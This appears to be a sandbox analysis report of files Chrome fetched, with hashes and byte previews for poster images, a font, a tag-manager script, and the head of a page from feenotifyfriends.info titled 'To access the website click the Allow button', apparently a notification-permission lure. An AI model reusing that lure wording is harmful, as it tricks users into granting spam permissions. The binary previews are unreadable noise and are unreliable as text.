                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................`.,..B...:....7..5....?...P....P....t..IPd...]....ipD.*..J...y......ceRg..Q...@P.#...60.j.94:........+....O%(.....X.<T9..z<.Y.a..vgo..Y..V[5Z..&..&...I..&..5.Yg.1Dm./#..H.!]..(%th#..u..d.ui......b...c2..K:...y..gh..R.Y..&.bi...v.,R+.Nj;.G....S.nJ.r$[.Vi....b'.[."6..H.a.=.PU..6I+{..HK.w.8{.9..Q0..\F.J...b...!y.;Qi;..L-.AW_L..4.(..;..d..D!;...Ri.I.>.^.'.Q...).D..e..evS.e...D..?..9,X.B........3........Y.H.b.{......f@.B.7..:..2`.}...j.a.Z....`D.F...|.]....k#.f'....v.5......o..u..oyx..t."...K.H^..z.....}.)n..{.Hk.|.!&.6[...I..[!..vj...>+.i.\.h..@.V.\..b+.[...V.L.n..=....^.a/:[V.].z.}.=.%..j#.....N>.s{..X..O^....e4.:.K....k.=N..U.1. M.7.n.. ^E~.0....H.ciy...q..*nA]..V....^.._.-..3.-Lj../[o....qw.wr....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x421, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):22176
                                                                                                                                                                                          Entropy (8bit):7.97285190313166
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:BBDCVVsWLx9CPrvoV/QHI1WdqfVkoLgZqfOBg9BCCu+5Ag/nRy:BtCVS2SEKHI1QqbL3fC8CCu+5Agc
                                                                                                                                                                                          MD5:F300845C32B49D010D57DA04E466990A
                                                                                                                                                                                          SHA1:1EFDB03BD7125AE8D64853E064E773CC9EB55BFF
                                                                                                                                                                                          SHA-256:6C17742945718258DC26BC993826217906D9413703214B7BED9EF39D31AC77E1
                                                                                                                                                                                          SHA-512:C841622C37395865D60FDD8AA4E344D0A87875A4E1C27E8E83510C24567DC28EFA67E55AB8B3184562E296DEB1435402F2EBDE39D88D8D84B4CA5E20CEC8CCB8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNjZlOWE2MjUtZDZhNS00YzdkLTlkMzMtMWZmMGRlOTRiMmY3XkEyXkFqcGdeQXVyMjUyMTE3MTc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................k..f2c0%....2..Y.%.g.4...n.~...Oo[.|...;.y."b......*.k."....../4.......bID...<.......^.8%..i..2.wHu.u"..M.5z.;...Y.h.<.._......E.p....b.I.FZ'...T...u.W...|..m..g...@qG.....l..%..?.....u;..M....Xyu.....5KUI...LA.1v.7.".<...,L.TTQ^.$y..GJX..4z.0....,......0........V.`..Y.[..%.sb.gS....-cYC6._.5.3.L..k....Qma.J.W.X.B..`uB=..Znc..........M.o.+h..a5...a...lu...Kg...$....B.s..?4..b.."..=.J.v.e..o.Nhy.-).V...:..?.8.=oj.t......'...9>..NM...e..pa..u..W............k.S.)k..$.e.7.S:.gh...p...H..|.\.....,..%z.. .rk.k..g..k.5mN^$v.Y...-.1#.)..}2M.+G..;.._..co.|.8.}..6f..J...C..H;........vibq..F.cR....IDdE.....[..j.-.f.:NSS.5.....y.%Y.\2..lH....sxE*.l+....WH...o..W.......Mr^..J*.X.W6...:M.%..#fd.a--...z...b..=...[.U.Ri..p.&%....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x463, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):36095
                                                                                                                                                                                          Entropy (8bit):7.975694499242551
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:6lDDXGnG8nvy5hjglqfOdCjg8s3YSTm0+JYVIzs3y4:m4GIvKloP8s3Yv0zOG
                                                                                                                                                                                          MD5:91338A967DF2B366007DC5A416B92894
                                                                                                                                                                                          SHA1:1E87D9945C999967C522DC9842EFC4F93A2018CF
                                                                                                                                                                                          SHA-256:D1B083C9225649D81AEFE2483968834ED8D3666E6ED28D6F4A1784B768C81D3F
                                                                                                                                                                                          SHA-512:35E6702FEEB73E54EC151BDA4B753CABBDAF11A71244C6FA6B4214A091622B1E59F557E4C5650D06C38F30DA2C3FF80552A8D8773463AD695F3292A5E5ED8D27
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BOWZkZTM2YjMtZDgxNy00ODFhLWEzOGEtZGUxZTZmZWVkMTEzXkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5....................................................................}..&.uO.../`.7,na.X.U.g?..nj...]...9....Q..n`....b.Q.../a...[&A...9....gS...aA>0......~...q...'...+..<.w.!s.....1....E....i_..l-.Y.d...N..Pyi.ep.:.,....\....lA.A.3da......2.T.6.Z.xu.7.g.xM.AC.x..X.^/n/.%.+.z..+.|..&..cn.....+......tC...q./&*64.1.....X.s.e..?.....R]6.........V..t..T.Kr....~=d.I...;8....)...;).:.N{....(....8.zj.5N...f.X..]...I..n*.x.s}G.eM.Yo..s.%.G..)`("x..~./'...z.~..]^Y.>...A-.Bl........=+.U...*....\=.T......o....'.aD...d..q.2^.[oB..z/...`l<}..|..0/.....*.:..V..k.....% ...0..Xw.s....S.....o..wIh.2.v...Is.j.+..\.oia...a.-.4.hm\.dyzsV@..|..P.:.DN...=e~]9..4....}....L. N....TMC..q..5...)45...F...rGB.B>...7+..1..-.%F..3/.J.......?.b?.O.0D...:.............n......A....A}..+;.=..}s'_.-.!..k.j.'..#.^.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):37560
                                                                                                                                                                                          Entropy (8bit):7.986223907293676
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Ll9N2II2B4mgBlFBQAYRiTykY3JsrS7r80CNwN9SuRCjbfVXO9bQ0J7PVOtKO:LlndyT2AYRiTu3lrww/RCjbdqXi/
                                                                                                                                                                                          MD5:C882C5D076B3773FAF70DE4445BF5DF5
                                                                                                                                                                                          SHA1:66F8A52B3B1DB229A711BD4FFD39656518584EAC
                                                                                                                                                                                          SHA-256:C10384D9EDC303F386D4276910C3540F088CE32661B009DFD9BBFA69F56CA7F1
                                                                                                                                                                                          SHA-512:F6D27B32259C3394E44717A4C01AF7B5F4EF43F9767EBF8F0F3E847AB8F5ADC5C79C9145499AD34F691624713D9B400F177EBC9063737AEF59F0E15995A04AC3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMjEyMzYyZWEtYzM3Ny00YTgxLThmMTQtY2YzM2JkYWQ1YzNjXkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6..................................................................K.cF7G'..~..3\j.[.V..>...$..=C...{"/...{..l.^....42J{....g.r..c......j.o.p..W..:UONg...e..m......qk7{A!...w.+.JgD.5...a........Gx......b*...+[.t...=`...6E./-......*-..[..Z..T.m...G\Zc%F..C.).3k&:%...V......(... .av..%...H..EM...%........Vg'L..'d&.t/#tF.B..%.....i.3.(+j....l%/.].2.1.....i;^......MuYdt..K".n.F'.U....O...M{........N.:e.;.5l.Z@GA$LP..T.n.nH....V3]9....r.B.#\...........w..W..o..*.Fw...nb:.F..k....R6.o(...............a..h.....qJ..?.....^R[:..c]m....^.....4...5,.....Xs...z.w...a.w..W.".-^....vxg...2..h.N.r.....j.(..M"..X...2.bc..F..o..R[.R..q..77.G..i8..x@.^F..3g).h....+._<X."<Mm./.y.s..].F>..'.r].....y....Y..b...m...?.+*..i+..vr__......@....X... U.i.aTk...${...,.N..I1..q&`..{..A..Z,.._..j*...^.W.>xI...X
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x396, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):24037
                                                                                                                                                                                          Entropy (8bit):7.978377288633001
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:IwlPqqzP7PnlQem6opCYEwVl5vgTuh4BQkjzmieKnCafDb5KZO1uq9BhgzmNcRGY:JPqqTLHm61eVTvgTdQazm8xKZO1urCNk
                                                                                                                                                                                          MD5:479CD2BB1AA60EB6A2C059C4795A6600
                                                                                                                                                                                          SHA1:BACD456D3168F48F23B3C0BE4F071BA02C3D8F9D
                                                                                                                                                                                          SHA-256:82F022CECFFC4B7AD7518A822C0376A2C0AE17D5369468FE073020F639DF362E
                                                                                                                                                                                          SHA-512:E62837B57DD6D7ACD11AE386B24226B124109E04CEA30BF4D911E7323B9C32F164C14668130F0477232A451FE3F05E9BB3A7A73A5C42B46B3066716B58347636
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZWFjNGI2ODgtMTFmNi00NDU5LWIwNjEtZThmNjk0OTNlNWFiXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................W.B&...A....'`c....... `........o5....w..U7...6..<k..Q6.c<lI..N.L......u$3...S..\....'.s..L{...^.F..'.......f..1..Sa.C...u.-......U..FH....V."U...P.n.|..u_i...o...q]3..<.x..f.N...".'`.;.~./}2.P.d.<9..ci...ye.='%...Hg..I.Q. ..N..........d[?7...=...}..k|.f..z. ^4..ik'..PS>.U.B.x.'.....ElP.<.P=...R..\b.bp.^(.Q8.P.@.....=.Q.....^e/.v(.......:n...;E....9]vx-...Q..?./ryM.?..A.w.n.)].RJ.ot...2./...K...<.So].t...i..).L.r......!:....._...O.&f..y`.!..<......<.g...s.......=[A.;...... ....`...F.._&rB......|.O...@....]N...M^5.7..lu.w..w.+...~.........:....<...E$.x(.......v.}....j.K.}..#O.....B.K/_.td;..RQ.....R...W.>..rD...>..t.F...XO*7..1./.B. ....$\.HU.......:.aZ.W....:..E.."...J....Y.[..aM.OG.d2,P....y../,.C.#R.-&))q..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x472, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):31386
                                                                                                                                                                                          Entropy (8bit):7.971276407098955
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:UBqZlkRRf0dUKKVOpF+zXmHgwaEr+fl+w6Zw:UBQNiRz29aEr+8wx
                                                                                                                                                                                          MD5:45894229D08AEDD4DB8E31002D5CA35B
                                                                                                                                                                                          SHA1:01722E5BF5A6C277CCE5DE7AE346EF3FFE771B1A
                                                                                                                                                                                          SHA-256:8F13DE64BC261EEAC7E3C322666E3A7F1D823886941209475068ACF9507DD83A
                                                                                                                                                                                          SHA-512:C8E2615B6F01FC0C72537904F212F80812452E4EDDC7496A1AD53BC2E383B0DAFABE23266929244CBD38A972A7B9D4776C5E47015330769C91A7C8F663EF1E88
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4.................................................................a....5..37@.NA....}IP.g4....w.....).\.ln.6'...uW.rh..j.(`./!.!...a..v4..lw....?.lK..:....rX..F).....i.Q......1$..4.t2...JB...b.y.$.Q.b....}O..<.}..r.I...r...C.p.....^|.._....IP...".i.G.J....g`.N../......x...=8.^.<.f.......w..*...cPUG8..y...7.4..^K.w.7Y.....[...;.e.......R..N@..C.J........n.M......].{Y..t.....M...72..._Ee. .*..]..J.*..o?/..Sw.Q...l.w...y..Y..:.}....{C...y..^1..O....<.......-.....1.ze...?&k.....[...t.!9...*E...r.v=....X:.>....v?W.>>.u....N[c.-...n.g..6.Y..z'.<Q.<O.........*....j..m....WN2.p....W..>.e.....-..s>N.m....kh.f....^..}y..:.M..k.L..}$7..3...e..q...3O.........dk.z.....V...k7....uz.6.pk+}..."...y...4...........f.]..+~..B...|.(.w..{u..p..2`.J..v.m..I[.......t...J..e.0..g./.a.G*.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x409, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):45655
                                                                                                                                                                                          Entropy (8bit):7.987658538573198
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Q4vbYjj3np867OZmfFhY8XcxX8RwwHmNMPTZnN7L0u5YamWe:Q4vcvnp8UOZmfLUMRJiM7LbYamWe
                                                                                                                                                                                          MD5:47EA8EC724E9DFB566A3E8D6EE3E42B3
                                                                                                                                                                                          SHA1:B60D226A55A69B1BE42906C661CF2D1324818942
                                                                                                                                                                                          SHA-256:263F90E85F5720885A14BD9268ABB5BB308D4B8E7027348A1D4539E32CC2022A
                                                                                                                                                                                          SHA-512:458C935F66182CDEC07C8E7FCD1607C5D9154235753A957F250E9F7BBE5AD4C37F5DBE52803E1E28E2226C59CAADBD618B966FABADC68D6A09E33FA070C6CC9F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5.................................................................`......w...$.....=....0....J.?.I..E.....S:i.K...G#..[-ksUeP..........m...*6.I...v.#.74v..(.s3M..P.[~......^N.kn.h.y....>R.|(iF>X..yC....KAaB...[...T...H...Z.h.fE.49...`.....i..\rp...p.....k..A..t...J..f..u;[..k.'.X....l&U5...F..2./.*....z.N..E.d..U...Y...d..5u.eqeh.#./.{H.!...8Yq...*..6...w....!.....:....W%k#.y.EL...k.5.0\E\.;.4.\..s...Vh..Z....k.oI..!q..F...[.{Q....W.u..^.+........8..Y.Vo...ai......2I.Lu....K.,.)..ZD.....<E.h..........[..!..?il.Gm.....'\.a...8k...V.........d>.....fI.....9r.....$..V/..V.n*..T.V..$-.-.M.."..m...Z<;..@v...X..To..j.A...l.v.j.Eh......x...6...{.w.8.w2.J...L..5...GE..-...m..3.B.....6...>.......Ex..N..T.......{+b.Wn....(...".M.?.0:R.....G;..$.\ry....W...O@x[...l...[_$....I.O..........<....b.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 27444, version 1.0
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):27444
                                                                                                                                                                                          Entropy (8bit):7.992085319880208
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:768:fsJMrdHxJnTKDF7e7XvmgzC2PXZDQP8NNZN/FX9559j:aMxR5eeLvm+CypDvjZNdX955R
                                                                                                                                                                                          MD5:13D1B429E99059F97E58FA10DD69F8B5
                                                                                                                                                                                          SHA1:174C7F299158103127D50DE82F1086C3B66E8258
                                                                                                                                                                                          SHA-256:1262BFF0591C36094D058AB102B84CE34EB1E547E8FF00557BF8D55449E58E40
                                                                                                                                                                                          SHA-512:30DBD99F1ABE8D2A9DDF73A93ED199FFB2B55903B5BC2618935A64AD54706F054FC9B46A80CCD1CAB4EFF3F5A607B5B599F5E02A2E89C990E10B210E4F16ED9D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko20yw.woff2
                                                                                                                                                                                          Preview:wOF2......k4..........j...........................1..0..2?HVAR.5?MVARF.`?STAT....</\..........@.0..x.6.$..|. ..\..5...>.%c"..J..6UyH. Vg#j.8`Cf.7#.$..g..F..!+..K..N.E.2....T.:.F..............bX.q...Q.i.0.[h............5B..h.{p...B.NJ0q.G.[..]..rj..".S.......a'[S..y.......e...8qtf.o...'.$......}.Z@...L.....p..c.~...{_.x.." "".*...Q(b..E..3.].n...H].K..Y.[3<..?..*-.H..E/.\N...H. ....5........U...N...\..i....ZV.X.p.XTW]yM..9.*...w9......'..|.?E..R)Bu.0.U/..B..e...'..bI..-......{...q.t.{_o}..'@^..&1O.j{...... ..?H..(....<KF.XR...B....g.@..,...m.|w..Q5.......%.......M....0l........c..78.$..k..(|..W......B....f...N..wF#...;.!..G....E.E..,...~....z.N.+.X..e...7.9...O......3...!T,|.j]_.}..q.......Q0.?.v..T.....FB..f...\.s.... ......S.m..Hi.M...HN.o......%..?..).3o...RH.v.._Cp........... V..`*. ..R~........'D~...uJ...C.~.s..E.S..E.5....:._.3..F.q...=..$T....f.....6.5.0.Vu....U.Ye.0.!S.X.F....w..k..C.:.g.J.ms..]i......k:...'qx..........u.,V+*..Y...y..s
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61786)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):225604
                                                                                                                                                                                          Entropy (8bit):6.249150607485369
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:S5Y4KczR85MIACsVa6zOptf1NzghUKZT6DRF11aC/ylKsySwO3NTfgiCML/2fWuD:N49IMIeafKx6DRJaCpdO3eML/2euRoVu
                                                                                                                                                                                          MD5:F38989EB08CE91400184D0342CEF9069
                                                                                                                                                                                          SHA1:2B1627396E9E2575096CD00AEAC9EDF59FEFDB6D
                                                                                                                                                                                          SHA-256:AC271CE7A7F019363BFFBBE5203A033D9BA6541C6E33FB6FC116CDA4F844AABF
                                                                                                                                                                                          SHA-512:3C80022C03C8893F07544B181BF8F34C320AA567B1E878C7B15BB2B304A082338D72BA38D62C99F7196E091B65C4E0F99FE8413C280C4DAF053B019A65A9D6A7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang="ar">.<head>. replaceManifest-->.. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1">.. <meta name="csrf-param" content="_csrf">. <meta name="csrf-token". content="-sCNEcHBAMs9QDsxzW0dz1_k3zFcsTNdlJkOGv01S-Kyq9hQtbFPgWUieVWFW3D6F7uYZT3SHjfC2lZTvmEGpQ==">. <title>To access the website click the &quot;Allow&quot; button</title>. <link type="image/png" href="https://feenotifyfriends.info/media/landings/favicon.ico?b=7" rel="icon">. <link type="image/png" href="https://feenotifyfriends.info/media/manage/images/logo-square.png?b=7". rel="apple-touch-icon">. <style>. body, html {. height: 100%. }.. a, abbr, acronym, address, applet, article, aside, audio, b, big, blockquote, body, canvas, caption, center, cite, code, dd, del, details, dfn, div, dl, dt, em, embed, fieldset, figcaption, fi
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x451, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):42594
                                                                                                                                                                                          Entropy (8bit):7.980623182070504
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:VXgIoIrCoT67bqeNxagV+DlHjzQKucMwNVVYHnhmhFpURIdhTxC3tcNuyut:2OCoevGxHnQKIq8IFZjs3tcU
                                                                                                                                                                                          MD5:E53069F7D61D70A90333D5DD36FBE0A8
                                                                                                                                                                                          SHA1:B4993CC79E8CC565DB8AF1573C131EFEE1D2E2CB
                                                                                                                                                                                          SHA-256:19ADDF139EC4F2DA487C3AB42E75168CB124B50973BD8EC82E87371B223E9799
                                                                                                                                                                                          SHA-512:4BEE2A5232F0D1585DFFE77D564EDEC81C7930A7EBE7EBDB7C93D8C27FF0917D0E4D53492B67D4039794B0F8274127B35249C75E657F1D9ACDA6FAF1679DBA7B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4................................................................@#..w.3.n/9.zFKL..rT.~.....#..p#.;Sz`.9Nn.dw...N=..o3...sgn....8....D..[...'..t1j.....|7i..75.0......;+..C....%...K...@...A....$t...h^..0Y. ...[u.tl..O.2..p...2y.........a....l.ka........g..5..V.#b......,T......oKk....[.WQE.l...C.J*T.efw...W.q"<./.....,-.o..y2..p..np....^..F.I......h...}.k/NS~.........r....~.e>.....c...~..Y)=..4 c6..c.M..h*X...f.N.....gK..`S..Y....w.:.{W.%..*.4...b...:y.1.M..R..UT.q.8;..|R.5!C1.p_Y..>..ac}.z..+.V...~..l..n.,/4c.u..Ms..:h.<.!(.P...Msu..../......-).<.o6.Uj..R. 7..Z......~n..g....s.O.....#].m.d#..<..&....^we.u.l^z..V...^:....M5...,...%...Ht.. .=..s...M...E...:<..<..K.......5OnTP.1.....Yi.RP.7.............n.....t.N.M..)].~..u...+.3....B.Kr.F=.v..,.N..G.=.n...........;7.J.././.....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):30822
                                                                                                                                                                                          Entropy (8bit):7.96950320632716
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:iVoGLnq8OGLRTPSD3k9AnAEpCZJV6LVi4:iZJZRPt5EA4
                                                                                                                                                                                          MD5:928EAEA1B5CF0BE1696E98A7E42C2550
                                                                                                                                                                                          SHA1:B8A63701A1A136FC6813D70BB09E201F119F31C5
                                                                                                                                                                                          SHA-256:2ED4556FAC9027DCE0362A6E16DE0671EE4AAEE5D55F735301DF32DD724DEE69
                                                                                                                                                                                          SHA-512:D8404883EF40C42641DD0FDFFD58E715DCDB4B786A8AD25C1E8CEE7F1388512A24090B18E6C91F5B2E26933BF50C2CA0052B6257A7D4C61C305BDF374A2BADEB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMjI3MDRhNmEtMWMwNi00MjMxLWIzNzktOGE0NGY0ZTZkNzA4XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6...................................................................`.,..B...:....7..5....?...P....P....t..IPd...]....ipD.*..J...y......ceRg..Q...@P.#...60.j.94:........+....O%(.....X.<T9..z<.Y.a..vgo..Y..V[5Z..&..&...I..&..5.Yg.1Dm./#..H.!]..(%th#..u..d.ui......b...c2..K:...y..gh..R.Y..&.bi...v.,R+.Nj;.G....S.nJ.r$[.Vi....b'.[."6..H.a.=.PU..6I+{..HK.w.8{.9..Q0..\F.J...b...!y.;Qi;..L-.AW_L..4.(..;..d..D!;...Ri.I.>.^.'.Q...).D..e..evS.e...D..?..9,X.B........3........Y.H.b.{......f@.B.7..:..2`.}...j.a.Z....`D.F...|.]....k#.f'....v.5......o..u..oyx..t."...K.H^..z.....}.)n..{.Hk.|.!&.6[...I..[!..vj...>+.i.\.h..@.V.\..b+.[...V.L.n..=....^.a/:[V.].z.}.=.%..j#.....N>.s{..X..O^....e4.:.K....k.=N..U.1. M.7.n.. ^E~.0....H.ciy...q..*nA]..V....^.._.-..3.-Lj../[o....qw.wr....
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):44775
                                                                                                                                                                                          Entropy (8bit):7.9830499432435325
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:VuSxeOV+QkgJBXaMLRJYMWgGPm4GEsXmnOw6OqK/PRVucqH1BVbLQ3Pj1cW5PF3i:lkOUQlJJDXTW+4dsXmOwxxVu9rVbM3u3
                                                                                                                                                                                          MD5:841B402B5C3556324FAEBACC4742793D
                                                                                                                                                                                          SHA1:3CED92F78883AA41EB752A7FB0E2E9F28DA5A776
                                                                                                                                                                                          SHA-256:79D05FD78B4228D636171FFCBF2A079D8E21A245D32ADA38ADECB70FED5C37F2
                                                                                                                                                                                          SHA-512:087A418160929E875CDB68CF8D22B00C65C5E38F8AD47A7227860A7EAE94C66385DBFACF91D2B0448688A17A27EE2A1CF83E883A05AF58721D27B2DA41B14B83
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................`......(.E...G....$...a..e........T...'.......GW$........HrM..N.y=`...3.:...{g....[.._]..+!i.. .L.........4...e5H..Yzyc...b.zVp....J..[.1\..I.g.uG.SI.........B.oND.En.P.G.Y..7?EX.r 0.%>d.F>.1..........%....%. .*...n*..\.c.n.Fh).&j..;.L.'f...,.........9%>...W....a..5Y..ZM.9..]6..u.X..\=.gsqy...g.....E.Vt!i........)D.......#....Q.&......^,....RZ...O.r...-97...$h....m..{..#. ....Xe...4S...T.$....@.....z.1L..nR...w-...".$..Xc..........`.gv.Ds$t.$...|.....m.r\.`...........(WR...&.4.z..).2...b.1.e|R..]7.....M...Lu9.jL...~..,B2.............W.HEob.'B.6..L...L..%.y.R...a.S..p.Z.~`.6.W8...".T................OU...:...Ue....SX....UU.3.......e...-..~..@.\1|-.Ko.Y.a`c.......o.R....u....1........NF.jJqT.%"..KY....vp
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):315370
                                                                                                                                                                                          Entropy (8bit):5.586144335599097
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:34S5YnsmQ8odZ1HcRCrKkEZMf3/JrfyXuT+bs+X:ISZm9od7Hc8C9PX
                                                                                                                                                                                          MD5:4D2DCAF004DC2356AFE5AEA640132358
                                                                                                                                                                                          SHA1:62EFE5CBBE9957E9B555EC13C74E3481EBA8FD97
                                                                                                                                                                                          SHA-256:CCB41347ED0180E91F6D2AFAAC43F59F5C389159500AC8BD8A5016244E79911A
                                                                                                                                                                                          SHA-512:537F035E9A67434F36163E6139E4F4CCFF44AB86C354845DA0CA6A59FF1CEBE0CA92B4CB0B88311664A00448C147D00536623DB6E32556B96ABEF96C4D10A2DE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":22,"tag_id":6},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddres
